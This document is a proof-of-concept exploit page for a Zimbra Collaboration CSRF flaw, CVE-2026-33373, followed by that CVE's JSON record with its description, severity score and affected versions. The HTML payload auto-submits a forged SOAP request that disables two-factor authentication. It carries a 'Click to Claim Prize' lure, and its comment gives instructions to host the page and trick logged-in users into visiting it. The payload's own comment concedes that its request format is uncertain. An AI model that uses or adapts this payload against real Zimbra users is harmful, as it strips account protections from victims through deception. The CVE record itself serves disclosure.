CVE-2026-33373

<!-- PoC for CVE-2026-33373: CSRF to Disable Two-Factor Authentication Description: This HTML page attempts to send a crafted SOAP request to disable 2FA. Usage: Host this file and trick an authenticated Zimbra user into visiting it. --> <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://<target-zimbra-domain>/service/soap/DisableTwoFactorAuthRequest" method="POST"> <input type="hidden" name="" value="" /> <!-- The actual SOAP envelope would be sent in the body or as a parameter depending on endpoint implementation --> <input type="hidden" name="soapenv" value="&lt;soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot;&gt;&lt;soap:Header&gt;&lt;context xmlns=&quot;urn:zimbra&quot;/&gt;&lt;/soap:Header&gt;&lt;soap:Body&gt;&lt;DisableTwoFactorAuthRequest xmlns=&quot;urn:zimbraAccount&quot;/&gt;&lt;/soap:Body&gt;&lt;/soap:Envelope&gt;" /> <input type="submit" value="Click to Claim Prize" /> </form> <script> document.forms[0].submit(); </script> </body> </html>

{"cve": {"id": "CVE-2026-33373", "sourceIdentifier": "[email protected]", "published": "2026-03-30T15:16:29.410", "lastModified": "2026-04-07T18:50:47.480", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Zimbra Collaboration (ZCS) 10.0 and 10.1. A Cross-Site Request Forgery (CSRF) vulnerability exists in Zimbra Web Client due to the issuance of authentication tokens without CSRF protection during certain account state transitions. Specifically, tokens generated after operations such as enabling two-factor authentication or changing a password may lack CSRF enforcement. While such a token is active, authenticated SOAP requests that trigger token generation or state changes can be performed without CSRF validation. An attacker could exploit this by inducing a victim to submit crafted requests, potentially allowing sensitive account actions such as disabling two-factor authentication. The issue is mitigated by ensuring CSRF protection is consistently enforced for all issued authentication tokens."}, {"lang": "es", "value": "Se descubrió un problema en Zimbra Collaboration (ZCS) 10.0 y 10.1. Existe una vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en el cliente web de Zimbra debido a la emisión de tokens de autenticación sin protección CSRF durante ciertas transiciones de estado de cuenta. Específicamente, los tokens generados después de operaciones como habilitar la autenticación de dos factores o cambiar una contraseña pueden carecer de aplicación de CSRF. Mientras dicho token esté activo, las peticiones SOAP autenticadas que desencadenan la generación de tokens o cambios de estado pueden realizarse sin validación CSRF. Un atacante podría explotar esto induciendo a una víctima a enviar peticiones manipuladas, lo que podría permitir acciones sensibles en la cuenta como deshabilitar la autenticación de dos factores. El problema se mitiga asegurando que la protección CSRF se aplique consistentemente para todos los tokens de autenticación emitidos."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "10.0.18", "matchCriteriaId": "7D423DB3-FCD4-445F-A778-BC5F83E01953"}, {"vulnerable": true, "criteria": "cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.1.0", "versionEndExcluding": "10.1.13", "matchCriteriaId": "7C3F6B1E-1671-461B-A093-7B6854C227FE"}]}]}], "references": [{"url": "https://wiki.zimbra.com/wiki/Security_Center", "source": "[email protected]", "tags": ["Vendor Advisory", "Release Notes"]}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Releases/10.0.18#Security_Fixes", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Releases/10.1.13#Security_Fixes", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy", "source": "[email protected]", "tags": ["Product"]}]}}